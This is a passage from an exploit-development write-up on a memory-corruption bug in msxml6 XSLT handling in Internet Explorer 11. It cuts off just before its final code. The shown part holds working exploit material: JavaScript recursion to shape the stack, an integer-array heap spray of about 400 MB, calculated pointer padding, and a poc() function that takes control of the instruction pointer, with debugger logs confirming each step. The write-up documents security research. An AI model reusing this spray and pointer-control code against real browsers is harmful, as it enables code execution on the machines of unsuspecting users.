0ed7b5e8          msxml6!XEngine::frame+0x84 ; --> the vulnerable stack frame <--
0ed7b668 711c3e2d msxml6!XEngine::frame+0x84
0ed7b710 7122ffb0 msxml6!XEngine::execute+0x1b4
0ed7b76c 7122fee3 msxml6!XUtility::executeXCode+0x90
0ed7b7c0 7122fe2b msxml6!XUtility::transformNode+0x4a
0ed7b82c 7122fda2 msxml6!DOMNode::transformNode+0xa6
...

--[ 3.2 - Inflating the stack 2: JavaScript recursion

After the failure with XSLT recursion I turned back to JavaScript. The
following simple factorial implementation will produce a massive
recursion on the stack:

    function factorial(n) {
        if(n == 0) {
            trigger();
            return 1
        } else {
            return n * factorial(n - 1);
        }
    }
    ...
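
A self-contained sketch of the same pattern is given here, with trigger() replaced by a harmless stub that merely records how many factorial() frames are live at the moment it runs. The names makeRecursion and depthAtTrigger are made up for this illustration; in the real proof of concept the stub's place would be taken by the transformNode() call, and the native stack cost of each JavaScript frame is not modelled.

```javascript
// Wrap the recursive factorial so that the number of live frames is
// visible to the trigger callback. `trigger` is a stand-in stub here.
function makeRecursion(trigger) {
  let live = 0; // factorial() frames currently on the stack
  function factorial(n) {
    live++;
    let result;
    if (n === 0) {
      trigger(live); // fires once, at the deepest point of the recursion
      result = 1;
    } else {
      result = n * factorial(n - 1);
    }
    live--;
    return result;
  }
  return factorial;
}

let depthAtTrigger = null;
const factorial = makeRecursion((depth) => {
  depthAtTrigger = depth;
});

const value = factorial(10);
console.log(value, depthAtTrigger); // prints "3628800 11"
```

The recursion argument n is therefore the knob that sets how many frames sit below the trigger.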

The vulnerability must be triggered from within the recursive code in
order to enjoy the inflated stack situation:

msxml6!XEngine::stns+0x6:
711c9c85 mov edx,dword ptr [eax+8] ds:0023:03a004ca=????????

0:005> !address eax
Usage:                  PageHeap
Base Address:           03961000
End Address:            03a60000
Region Size:            000ff000
State:                  00002000 MEM_RESERVE
Protect:
Type:                   00020000 MEM_PRIVATE
Allocation Base:        03960000
Allocation Protect:     00000001 PAGE_NOACCESS
More info:              !heap -p 0x3541000
More info:              !heap -p -a 0x3a004c2

0:005> !heap
Index   Address  Name      Debugging options enabled
  1:   016a0000
  2:   015e0000
  3:   00010000
  4:   019f0000
  5:   03720000   < landed here
  6:   06470000
  7:   06900000
  8:   06cd0000
  9:   07cb0000
 10:   07dd0000
 11:   09380000
 12:   07d60000
 13:   0c500000
 14:   0c670000
 15:   0cd30000

This time a valid userland address was accessed, and the access violation
was caused merely by the lack of a busy allocation at that address.

According to observations made across multiple tests, the thread stack
always starts slightly below the edge of a memory page:

test 1: 0532fbbc 00000000 ntdll!_RtlUserThreadStart+0x1b
test 2: 04d7fd34 00000000 ntdll!_RtlUserThreadStart+0x1b
test 3: 04a5ffd8 00000000 ntdll!_RtlUserThreadStart+0x1b
test 4: 055bfe80 00000000 ntdll!_RtlUserThreadStart+0x1b

More precisely, the exact address of the beginning of the stack varies
within a range of roughly 0x600 bytes, and so do the pointers to
stack-based variables. Because the lower word of a stack pointer becomes
the upper word of the crashing pointer, the crashing pointer varies by
0x06000000 on x86 systems, which means that the initial invalid memory
access will be observed at a random memory address within a range of
roughly 100 MB.
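
The arithmetic behind these figures can be checked with a short sketch. It assumes, as shown in the earlier dumps, that XEngine::stns() loads a dword that straddles two adjacent stack pointers and then reads from [eax+8]. The function name crashAddress() is made up for this illustration, and the pointer value 0x053201e0 is a hypothetical companion to the 0x05320300 example used earlier (only its upper word matters).

```javascript
// Compose the address dereferenced in XEngine::stns() from two adjacent
// stack pointers, as a 2-byte misaligned little-endian dword read does.
function crashAddress(firstPtr, secondPtr) {
  const low = firstPtr >>> 16;      // upper word of the first pointer
  const high = secondPtr & 0xffff;  // lower word of the second pointer
  const eax = ((high << 16) | low) >>> 0;
  return (eax + 8) >>> 0;           // stns reads from [eax+8]
}

function hex32(value) {
  return value.toString(16).padStart(8, "0");
}

// The pair of pointers from the original crash dump.
const observed = crashAddress(0x0532af20, 0x0532b040);

// Hypothetical inflated stack: second pointer at 0x05320300, then the same
// pointer moved by the assumed 0x600 bytes of stack start variability.
const jitter = 0x600;
const lowest = crashAddress(0x053201e0, 0x05320300);
const highest = crashAddress(0x053201e0, 0x05320300 + jitter);
const span = highest - lowest;

console.log(hex32(observed));                  // prints "b040053a"
console.log(hex32(lowest));                    // prints "0300053a"
console.log(hex32(span), span / (1024 * 1024)); // prints "06000000 96"
```

A spread of 0x600 bytes on the stack thus becomes a spread of 0x06000000 bytes (96 MiB) in the dereferenced address, which is where the figure of about 100 MB comes from.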
At this point we have two separate problems: first, to quickly fill at least 200-300 Mb of memory with controlled data (100 Mb required to catch the initial memory access, plus the room for secondary pointer dereference padding, plus some compensation for the variability of the allocation addresses), and second, to direct the crashing pointer into a specific region of that memory.

Note that heap spraying is considered a bad practice for a good reason, and that it's highly constrained if not impossible on 64bit systems with 128G of memory space to fill; but the nature of our vulnerability does not allow for an alternative approach. So, let's just take it as an exercise in the artful dealing with whatever is.

--[ 3.4 - Filling the memory 1: images

Because the memory region that must be controlled is rather big, my initial idea was to utilize some pre-calculated big objects for filling it, such as images. The core of the idea is that every piece of data that can be consumed and processed by the target application (e.g. output or rendered) has its place and a representation in the target process memory. Thinking like that, we don't get caught in stereotypical terms of 'heap spraying' and the specific techniques associated with it, many of which are already mitigated in browsers.

The idea of using graphical images in vulnerability development is not new. It was first introduced in 2006 by Sutton et al.[3], whose research focused mainly on the aesthetics of shellcode steganography in images rather than on solving any problems of heap spraying (as there were none at that time).
Later, a few researchers revisited the same idea in the context of heap spraying, but it has never found a real application, mainly because bitmaps (as the only format capable of incorporating a byte pattern 'as is') are huge and can only be shrunk with the help of server-side measures, while using other image formats for memory control purposes is burdened with calculation problems of recompression.

Apart from the server-side GZIP compression, another solution that has never been publicly noted is PNG. The PNG compression is very simple and does not affect the bitmap structure at large. As a result, a 2Mb BMP image containing a simple 1-byte pattern can be converted into a ~500 byte PNG image that will be decompressed back into the original bitmap in the rendering process memory.

There are two problems however:

1. The more variable the source bitmap pattern is, the bigger the resulting PNG image; a natural limitation of any compression.

2. The decompressed PNG has extra bytes in the bitmap data, injected after every 3 bytes of the original bitmap. It's probably a transparency channel or some other data specific to the PNG format.

The good news:

1. At the point when the PNG image is loaded and decompressed by the browser but is not yet displayed on the web page, the bitmap data in the process memory fully corresponds to the source BMP.

2. A large image is mapped into a comparably large and continuous chunk of memory, located at a somewhat predictable memory offset.

The PNG spraying technique proved to be unsuitable for this particular case because a highly variable memory padding pattern would be required, and so the images would have to be too big anyway. However, it still looks like an interesting technique for rapid filling of huge memory areas with a simple byte pattern.

--[ 3.5 - Filling the memory 2: integers

After testing various memory filling techniques, I've finally settled on integer arrays.
The following JavaScript code will quickly fill 400Mb of the memory of Internet Explorer 11 with a continuous constant-dword spray: var intArr = new Array; var count = (0x19000000-0x20)/4; intArr[0] = 0x01c0ffee; // marker // s 0 l?80000000 ee ff c0 01 for(var i=1; i<=count; i++) intArr[i] = 0x17151715; alert('done'); It's curious to note that varying the values in the spraying loop may sometimes result in an internal exception in IE, e.g. when trying to fill more than 400 Mb of the browser memory, or using an 'AAAA' integer equivalent for the filling. This looks like a protection from heap spraying, but it does not pose a major obstacle to the task. The resulting memory filling is distributed across two big and continuous allocations as follows: 0:028> s 0 l?80000000 ee ff c0 01 0531b4f0 ee ff c0 01 f8 ff ff ff-00 00 00 00 00 00 00 00 ............. ; just the marker dword, not relevant 08391860 ee ff c0 01 15 17 15 17-15 17 15 17 15 17 15 17 ............. ; a <0x200 bytes chunk, not relevant 085dd0d8 ee ff c0 01 15 17 15 17-15 17 15 17 15 17 15 17 ............. ; a <0x10 bytes chunk, not relevant 085de510 ee ff c0 01 15 17 15 17-15 17 15 17 15 17 15 17 ............. ; a <0x200 bytes chunk, not relevant 12da5a18 ee ff c0 01 e3 ff c0 01-ce ff c3 01 b8 ff cc 01 ............. ; random garbage 2c540020 ee ff c0 01 15 17 15 17-15 17 15 17 15 17 15 17 ............. ; the array, part 1 3eec0020 ee ff c0 01 15 17 15 17-15 17 15 17 15 17 15 17 ............. ; the array, part 2 The first allocation looks like simply unfinished, stopped around 300Mb, while the second allocation is full, and both of them are contiguous: 0:028> s 0 l?80000000 ee ff c0 01 ... 2c540020 ee ff c0 01 15 17 15 17-15 17 15 17 15 17 15 17 ............. 3eec0020 ee ff c0 01 15 17 15 17-15 17 15 17 15 17 15 17 ............. 0:028> ? 
3eec0020-2c540020 Evaluate expression: 311951360 = 12980000 0:028> db 2c540020+12980000-30 ; this is the borderline between the 1st and the 2nd allocations 3eebfff0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ............. 3eec0000 00 00 00 00 90 c4 fb 1e-00 00 00 00 00 00 00 00 ............. 3eec0010 00 00 00 00 f9 ff 3f 06-20 f1 be 07 00 00 00 00 ......?. .... 3eec0020 ee ff c0 01 15 17 15 17-15 17 15 17 15 17 15 17 ............. 3eec0030 15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17 ............. 3eec0040 15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17 ............. 3eec0050 15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17 ............. 3eec0060 15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17 ............. 0:028> db 2c540020+12000000 ; end of the 1st allocation is somewhere in between sizes ; 12000000 and 12980000 3e540020 15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17 ............. 3e540030 15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17 ............. 3e540040 15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17 ............. 3e540050 15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17 ............. 3e540060 15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17 ............. 3e540070 15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17 ............. 3e540080 15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17 ............. 3e540090 15 17 15 17 15 17 15 17-15 17 15 17 15 ;the second allocation: 0:028> db 3eec0020+19000000 ; pointers after the end of the allocation 57ec0020 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. 57ec0030 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. 57ec0040 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. 57ec0050 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. 57ec0060 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. 57ec0070 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. 57ec0080 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. 
57ec0090 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. 0:028> db 3eec0020+19000000-30 ; end of the second allocation 57ebfff0 15 17 15 17 15 17 15 17-15 17 15 17 15 17 15 17 ............. 57ec0000 15 17 15 17 02 00 00 80-02 00 00 80 02 00 00 80 ............. 57ec0010 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. 57ec0020 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. 57ec0030 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. 57ec0040 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. 57ec0050 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. 57ec0060 02 00 00 80 02 00 00 80-02 00 00 80 02 00 00 80 ............. Considering the addressing predictability of the allocations, two observations can be made across multiple tests: 1. Both allocations are aligned by 16 pages, added 0x20 bytes header with full page heap setting enabled (or 0x8 with the default setting). 2. The memory addresses of both allocations are highly predictable. 
In fact, the addresses of the two allocations would vary across the tests by 'just' approximately 0x1'000'000 bytes, which is not significant in terms of a 0x19'000'000+0x12'000'000 nearly continuous controlled memory space: ; windbg script log edited for readability ; produced by re-launching the app and recording the same allocations ; shows the addresses of the two intarray allocations Opened log file 'c:\users\user\desktop\windbg.log' 0x27f30020 0x3a8b0020 Opened log file 'c:\users\user\desktop\windbg.log' 0x283f0020 0x3ad70020 Opened log file 'c:\users\user\desktop\windbg.log' 0x27ea0020 0x3a820020 Opened log file 'c:\users\user\desktop\windbg.log' 0x28530020 0x3aeb0020 Opened log file 'c:\users\user\desktop\windbg.log' 0x284e0020 0x3ae60020 Opened log file 'c:\users\user\desktop\windbg.log' 0x28aa0020 0x3b420020 Opened log file 'c:\users\user\desktop\windbg.log' 0x28e60020 0x3b7e0020 Opened log file 'c:\users\user\desktop\windbg.log' 0x28440020 0x3adc0020 Opened log file 'c:\users\user\desktop\windbg.log' 0x28560020 0x3aee0020 Opened log file 'c:\users\user\desktop\windbg.log' 0x28480020 0x3ae00020 Opened log file 'c:\users\user\desktop\windbg.log' 0x28a00020 0x3b380020 Without researching the exact reasons of the highly predictable memory allocations, it seems logical if not inevitable that, the bigger the allocation, the more predictable its address would be on x86 systems because of the memory space limitation. This speculation is totally confirmed by observations with various allocation sizes. Considering the reliability risks of the allocations disposition in the memory, the expected memory map will likely change in the following situations: 1. Additional modules loaded by the browser, such as a BHO or an ActiveX. This factor cannot possibly be remote-controlled. On the other hand, the average size of an executable module is insignificant in terms of a 400Mb controlled memory allocation, so it shouldn't distort the expected memory map too much. 2. 
Additional web content processed in the same tab (images loaded, JavaScript executed etc.), that would change the stack situation. Because each IE tab is loaded in a separate process, this factor can be totally controlled by the vulnerable web page. 3. Microsoft changes IE internals. Not possible to control. 4. Full page heap setting enabled or disabled. The full page heap setting changes the entire memory layout significantly enough that the vulnerability control code must be fine-tuned with this regard specifically. All in all, at that point the memory landing space looks safe enough to be addressed. --[ 3.6 - Recursion control Having the control over the continuous region of memory in the range [0x28000000,0x57000000], it would probably be the safest to direct the crashing pointer in the middle of the range, e.g. around 0x47000000. To achieve this, the JavaScript recursion count must be specifically calculated to reach the crashing procedure around the stack offset of 0x...4700. The size of one JavaScript recursion frame in Internet Explorer 11 is 0x320, each frame corresponding to one cycle of the factorial algorithm: ; JavaScript factorial algorithm recursion on the stack 0529b0d4 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x1e8 0529b0e0 0x86c0fd9 0529b428 jscript9!Js::InterpreterStackFrame::Process+0xbd7 0529b544 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x1e8 0529b550 0x86c0fd9 0529b898 jscript9!Js::InterpreterStackFrame::Process+0xbd7 0529b9b4 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x1e8 0529b9c0 0x86c0fd9 Provided that the vulnerable browser will crash randomly around the stack offsets 0x...ac00 to 0x...b300, the stack must be inflated by 0xb650(+-0x350)-0x4700=0x6f50(+-0x350) bytes, which requires (0x6f50+-0x350)/0x320=35+-1 cycles of recursion, or the call to factorial(35). 
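The recursion depth estimate can be reproduced with a few lines of JavaScript. This is only a restatement of the arithmetic above; the constant and function names are mine, and the numbers are the ones quoted in the text for IE11.

```javascript
const FRAME_SIZE = 0x320;     // stack cost of one factorial() cycle
const CRASH_OFFSET = 0xb650;  // nominal stack offset used in the estimate
const SPREAD = 0x350;         // variability of that offset
const TARGET_OFFSET = 0x4700; // offset that sends the pointer to ~0x47000000

// Number of recursion cycles needed to move the crash down to the target.
function cycles(crashOffset) {
  return (crashOffset - TARGET_OFFSET) / FRAME_SIZE;
}

const nominal = cycles(CRASH_OFFSET);
const lowest = cycles(CRASH_OFFSET - SPREAD);
const highest = cycles(CRASH_OFFSET + SPREAD);

console.log(nominal.toFixed(2), lowest.toFixed(2), highest.toFixed(2));
console.log(Math.floor(nominal)); // recursion depth to pass to factorial()
```

All three estimates fall between 34 and 37 cycles, which is consistent with calling factorial(35).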
Indeed, testing this would cause an access violation around the desired address: (268.2a4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=489019b1 ebx=1a819ff0 ecx=1a819f42 edx=6f6e4430 esi=1a819f40 edi=19b14770 eip=6f6f9c85 esp=19b1476c ebp=19b14888 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 msxml6!XEngine::stns+0x6: 6f6f9c85 mov edx,dword ptr [eax+8] ds:0023:489019b9=???????? --[ 3.7 - Program counter control According to the vulnerable XCode execution logic, the address of the dynamic call in XEngine::brns() is retrieved via three consecutive dereferences from the crashing pointer: msxml6!XEngine::stns: 6f6f9c7f mov eax,dword ptr [ecx+0B0h] ; retrieved ptr0 (eax) 6f6f9c85 mov edx,dword ptr [eax+8] ; ptr0 -> crash / ptr1 (edx) 6f6f9c88 push esi 6f6f9c89 lea esi,[edx+0Ch] 6f6f9c8c mov dword ptr [eax+8],esi 6f6f9c8f mov eax,dword ptr [edx+4] ; ptr1 -> ptr2 (eax) 6f6f9c92 push 8 6f6f9c94 mov dword ptr [ecx+0A4h],eax ; store ptr2 6f6f9c9a pop eax 6f6f9c9b pop esi 6f6f9c9c ret ... msxml6!XEngine::brns: 712da250 mov edi,edi 712da252 push esi 712da253 mov esi,ecx 712da255 mov ecx,dword ptr [esi+0A4h];restore ptr2 (2 bytes randomized) 712da25b mov eax,dword ptr [ecx] ; ptr2 -> ptr3 (eax) 712da25d call dword ptr [eax] ; ptr3 -> shellcode Thus, the landing memory contents at ptr0 must satisfy the following dereference logic: Ptr0 (initial AV / address in the spray ) -> ptr1 -> ptr2 -> ptr3 -> shellcode In the above chain of pointers, pointers 1 and 3 are precise, as they are read from the memory padding; but pointer 0 is random within a 100Mb range due to the nature of the bug, and pointer 2 is only page-precise due to the 2-byte memory alignment differences in the procedures where the pointer is stored and then restored. 
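The chain can be modelled offline with a toy memory. The sketch below is not the author's code: the region bounds and fill values are made up for illustration, the write-back to [eax+8] in stns() is ignored, and the 2-byte store/load mismatch is modelled under the assumption that the low word of the stored ptr2 comes back as the high word of the reloaded value, with the remaining 16 bits (`noise16`) taken from neighbouring memory.

```javascript
// Toy model of the sprayed memory: two regions with made-up bounds.
function read32(addr) {
  if (addr >= 0x28000000 && addr < 0x50000000) {
    // Region 1 serves the first two reads: one slot per 64 Kb yields ptr2,
    // every other slot yields ptr1.
    return (addr & 0xffff) === 0x3c40 ? 0x54545454 : 0x3c3c3c3c;
  }
  if (addr >= 0x50000000 && addr < 0x58000000) {
    return 0x00badd1e; // region 2: ptr3, the pointer to the call target
  }
  throw new Error("access violation at 0x" + addr.toString(16));
}

// Follows the dereferences performed by stns() and brns().
function followChain(ptr0, noise16) {
  const ptr1 = read32(ptr0 + 8); // stns: mov edx,[eax+8]
  const ptr2 = read32(ptr1 + 4); // stns: mov eax,[edx+4]
  // brns reloads the stored value 2 bytes off (assumed model, see lead-in).
  const restored = (((ptr2 & 0xffff) << 16) | (noise16 & 0xffff)) >>> 0;
  const ptr3 = read32(restored); // brns: mov eax,[ecx]
  return { ptr1, ptr2, restored, ptr3 }; // brns then executes call [ptr3]
}

const chain = followChain(0x489019b1, 0x492c);
console.log(chain.restored.toString(16), chain.ptr3.toString(16));
```

Because ptr0 and the reloaded ptr2 are only approximately known, both regions have to answer with the same values over a wide range of addresses, while the slot that serves the ptr1 read can be placed exactly.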
Because only the 0th and the 2nd pointers are subject to randomized memory access, two separate memory areas are required to contain the entire dereference chain: the first part (dereferenced first) contains the pointers to the second part, the second part contains the pointers to the shellcode, and the precise addresses are treated specifically:

    function poc() {
        // !!! +hpa required !!!
        // bp msxml6!xengine::stns; bp msxml6!xengine::brns; g;
        var intArr = new Array;
        intArr[0] = 0x01c0ffee; // marker
        // s 0 l?80000000 ee ff c0 01
        var count = (0x19000000-0x20)/4; // 400 Mb
        for(var i=1; i<=count; i++) {
            // part1: ptr0/ptr1 read
            if ( i<(0x12000000/4) ) {
                if ( ((i*4+0x20)&0xffff) == (0x3c3c+4) ) // if it's a ptr1 read
                    intArr[i] = 0x54545454; // then yield ptr2
                else
                    intArr[i] = 0x3c3c3c3c; // otherwise, ptr1
            }
            // part2: ptr2 read
            else
                intArr[i] = 0x00badd1e; // ptr3 -> shell code
        }
        crash();
    }

The numerical values in the script were chosen empirically with the full page heap enabled; tweak them if anything doesn't work. And the result should be:

    (ddc.f28): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00badd1e ebx=11f71ff0 ecx=5454492c edx=5454492c esi=11f71f40 edi=04ef4740
    eip=6f6fa25d esp=04ef4738 ebp=04ef4858 iopl=0 nv up ei pl nz na po nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
    msxml6!XEngine::brns+0xd:
    6f6fa25d ff10 call dword ptr [eax] ds:0023:00badd1e=????????

--[ 4 - The self-patch

The next section will discuss a possible useful application of the gained control over the vulnerability without any shell code execution: self-patching of the vulnerable process.

--[ 4.1 - A leak without a leak

Unlike many memory corruption vulnerabilities, this particular one does not allow for an arbitrary memory write that could be used to leak some information allowing to bypass DEP and ASLR and to execute arbitrary code within the IE sandbox.
But the nature of the vulnerability would still allow for a small and limited information leak, which can be used to restore the memory values required to continue the normal execution (CoE) of the vulnerable application.

Specifically, because the crashing pointer contains the upper word of the stack offset in its lower part due to the misaligned memory read, and the controlled memory space is page-aligned, it is possible to 'leak' part of the stack address by translating the accessed memory address into the value read from that address with the help of the carefully calculated memory padding.

There are a few key points to understand about our precisely patterned padding.

1. We start with the idea that each dword in the spray must contain the value of its own offset within the page. Page-size patterning is enough because we only want to leak about 2 bytes of the stack address.

2. Next, we calculate all pattern values based on the spray loop counter as follows:

    i_pattern = i*4%0x1000;

3. We ensure that the aligned spray will also be aligned in memory by allocating a big enough continuous chunk of memory. Big memory allocations tend to be 16-pages aligned, i.e. starting with an address like 0xXYZQ0000 (see also windbg.log above), which looks like a sane memory optimization strategy with the heap manager.

4. Next, because the padding must resolve two consecutive memory dereferences while preserving the leaked bits of data inside the actual pointers, we split the page-sized pattern in two halves and fill them differently:

    else if (i_pattern < 0x0700)
        intArr[i] = ptr12base + ptr1;
    else
        intArr[i] = ptr12base + ptr2;

   This trick is only possible because of very little entropy observed in the high-order part of the randomly allocated stack offset, which tends to be around 0x04xxxxxx-0x06xxxxxx. Hence we in fact only want to leak 11 bits of the address and not 16, for which a 0x700 bytes pattern is sufficient.

5.
We differentiate the pointers in the two parts of the pattern by adding and removing a hand-picked, semi-random delta value to the leaking part of the pointer: var delta = 0x3300; 6. Finally, we adjust the calculations to the values of the respective dereference indexes, e.g. [eax+8] for the first read, as well as to the size of the heap header, which is 0x20 with full page heap: ptr1 = (i_pattern - 8 + 0x20 + delta); ptr2 = (i_pattern - 4 + 0x20 - (delta&0xfff)); Note that we mindfully use a delta value bigger than the size of the pattern, and then we also preserve the 2 higher bits of the added delta value in the 2nd stage pointers, that will eventually increase the reliability of the padding in the cases of misaligned memory access by ensuring that the majority of bytes in the spray will be equal to 0x38, and thus the final pointer will likely point into the controlled memory around 0x38xxxxxx, regardless of both the reading alignment and the leaked bits in the pointer. As a result of the correctly calculated and a correctly positioned padding, the initially read memory offset will re-surface in the program as the low-order word of the value that's eventually read from the range 0x3838xxxx: 0:007> dd 4b6004e0+8 ; 4b6004e0 = the original AV pointer ; 0th read // mov edx,dword ptr [eax+8] 4b6004e8 383837e0 383837e4 383837e8 383837ec 4b6004f8 383837f0 383837f4 383837f8 383837fc 4b600508 38383800 38383804 38383808 3838380c 4b600518 38383810 38383814 38383818 3838381c 4b600528 38383820 38383824 38383828 3838382c 4b600538 38383830 54545454 38383838 3838383c 4b600548 38383840 38383844 38383848 3838384c 4b600558 38383850 38383854 38383858 3838385c 0:007> dd 383837e0+4 ; 1st read // 04e0 is the high word of the stack address 383837e4 383804e0 383804e4 383804e8 383804ec 383837f4 383804f0 383804f4 383804f8 383804fc 38383804 38380500 38380504 38380508 3838050c 38383814 38380510 38380514 38380518 3838051c 38383824 38380520 38380524 38380528 3838052c 38383834 38380530 
38380534 54545454 3838053c 38383844 38380540 38380544 38380548 3838054c 38383854 38380550 38380554 38380558 3838055c The read value, that is the two leaked bytes of the stack offset, will then be used by the application itself to restore the original 3rd pointer, which results in retrieving of the correct address of the dynamic call in XEngine::brns(), and resuming of the program execution like if there was no vulnerability: 0:007> p ; our crafted value (read from the memory padding) ; with 2 leaked bytes of the stack address 04e0: eax=383804e0 ... ; write the crafted value msxml6!XEngine::stns+0x15: 6f6f9c94 8981a4000000 mov dword ptr [ecx+0A4h],eax ; value written via the misaligned pointer: 0:007> dd ecx+a4 l1 11b3dfe6 4c1404e0 ; value read via the sane pointer: 0:007> dd ecx+a4-2 11b3dfe4 04e04c2c ; looks good: 0:007> dds 04e04c2c 04e04c2c 6f6e44b8 msxml6!RTFNodeSet::`vftable' ; the original call pointer restored: 0:007> dds poi 04e04c2c 6f6e44b8 6f6e44d5 msxml6!XPSingleTextNav::_getParent And the result is the target application passing the crash-inducing code without a crash: *------------------------* | Message from webpage X | |------------------------| | | | Look, no calc! | | | | / OK / | *------------------------* --[ 4.2 - The offset-to-value translation As per my testing boxen, the upper word of the stack address would never exceed 0x06xx, and thus the crashing pointer would always fall within the first 0x700 bytes of the target memory page, so the remaining 0x900 bytes of the page may be used for the translation purposes: var i_pattern = i*4%0x1000; // index into the current page ptr1 = (i_pattern - 8 + 0x20 + delta); ptr2 = (i_pattern - 4 + 0x20 - (delta&0xfff)); if (i_pattern < 0x0700) intArr[i] = ptr12base + ptr1; else intArr[i] = ptr12base + ptr2; The problem here is that the original crashing pointer is not guaranteed to be correctly aligned, while the memory translation pattern must be dword-aligned. 
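The translation can be checked offline before touching the browser. The following is a minimal sketch, not the final proof-of-concept: it models a single patterned page in a DataView, assumes ptr12base = 0x38380000 (inferred from the 0x3838xxxx values in the dumps, the text does not state it), and leaves out the special 0x54545454 fallback slots. The helper names are hypothetical.

```javascript
const HEADER = 0x20;           // heap header size with full page heap
const DELTA = 0x3300;          // delta value quoted in the text
const PTR12_BASE = 0x38380000; // assumption: inferred from the dumps
const PAGE = 0x1000;

// Value stored in the dword slot at a given offset within its page.
function slotValue(pageOffset) {
  const iPattern = (pageOffset - HEADER) & 0xfff; // equals i*4 % 0x1000
  const ptr1 = iPattern - 8 + HEADER + DELTA;
  const ptr2 = iPattern - 4 + HEADER - (DELTA & 0xfff);
  return (PTR12_BASE + (iPattern < 0x0700 ? ptr1 : ptr2)) >>> 0;
}

// One patterned page plus 4 wrap-around bytes, so reads may be misaligned.
const page = new DataView(new ArrayBuffer(PAGE + 4));
for (let off = 0; off <= PAGE; off += 4) {
  page.setUint32(off, slotValue(off & 0xfff), true); // little-endian
}

// Every sprayed page looks the same, so only the page offset matters.
function read32(addr) {
  return page.getUint32(addr & 0xfff, true);
}

function translate(crashPtr) {
  const ptr1 = read32(crashPtr + 8); // mov edx,[eax+8]
  const ptr2 = read32(ptr1 + 4);     // mov eax,[edx+4]
  return { ptr1, ptr2 };
}

const aligned = translate(0x4b6004e0);
console.log(aligned.ptr1.toString(16), aligned.ptr2.toString(16));
console.log(read32(0x4fc0055e + 8).toString(16)); // first read, off by 2
```

For the aligned pointer 0x4b6004e0 the two reads return 0x383837e0 and 0x383804e0, so the low word of the final value equals the page offset of the original access. The off-by-2 read returns 0x38603838, which no longer carries the offset in its low word.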
That is, the correctly aligned memory access will result in reading a value like 0x3838XYZQ from the spray, where XYZQ are the leaked bits of the stack offset. But let's see what's read with a misaligned pointer: a. off by 1: 0x38XYZQ38 In this case the pointer still falls into the controlled memory area, but the XY bits of the leaked stack address will be mangled, because we can only guarantee 64Kb alignment of memory allocations. b. off by 2: 0xXYZQ3838 All bits of the stack address are lost, and the pointer looks unpredictable. But we can still enforce this to point to the controlled memory around 0x38xxxxxx by adding a specially crafted delta value of 0x3300 to calculated pointers in the spray as was mentioned earlier. So, e.g. the read value 0x07073838 will become a valid pointer to 0x3a373838. This is possible because the high 4 bits of the stack offset tend to be zero. c. off by 3: 0xZQ3838XY Most important bits of the stack offset are lost in this case, and also the ZQ leaked bits are highly entropic and cannot be made predictable as in the case b. Not much can be done with this case, that's likely to point into random memory and possibly cause an access violation. One thing to notice about the misalignment cases above is that both pointers a. and b. quite logically end with 0x38 that we use as the pattern base. So, we can catch 2 out of 3 misalignment cases in the code by checking the final byte against this value, and then address them specifically e.g. to fall back to raw EIP control instead of allowing a crash: // the address ends with 0x38+4: if ( ((i*4+0x20)&0xff) == (pbyte+4) ) intArr[i] = ptrcall; ... 0:007> r eax=4fc0055e ; the crashing pointer ... 
0:007> dd eax+8 ; 0th read: misaligned 4fc00566 38603838 38643838 38683838 386c3838 4fc00576 38703838 38743838 38783838 387c3838 4fc00586 38803838 38843838 38883838 388c3838 4fc00596 38903838 38943838 38983838 389c3838 4fc005a6 38a03838 38a43838 38a83838 38ac3838 4fc005b6 38b03838 38b43838 38b83838 38bc3838 4fc005c6 38c03838 38c43838 38c83838 38cc3838 4fc005d6 38d03838 38d43838 38d83838 38dc3838 0:007> dd 38603838+4 ; 1st read: special value 3860383c 54545454 3838053c 38380540 38380544 3860384c 38380548 3838054c 38380550 38380554 3860385c 38380558 3838055c 38380560 38380564 3860386c 38380568 3838056c 38380570 38380574 3860387c 38380578 3838057c 38380580 38380584 3860388c 38380588 3838058c 38380590 38380594 3860389c 38380598 3838059c 383805a0 383805a4 386038ac 383805a8 383805ac 383805b0 383805b4 0:007> dd 54545454 ; 2nd read / call address 54545454 00badd1e 00badd1e 00badd1e 00badd1e 54545464 00badd1e 00badd1e 00badd1e 00badd1e 54545474 00badd1e 00badd1e 00badd1e 00badd1e Regarding the last, 3-bytes misaligned memory access case that reads pointers like 0xZQ3838XY where ZQ is totally random, this is asking to precisely control the contents of entire memory space of the process, that may be not impossible but is likely not worth it. So I leave it alone as a crash. The final code is:
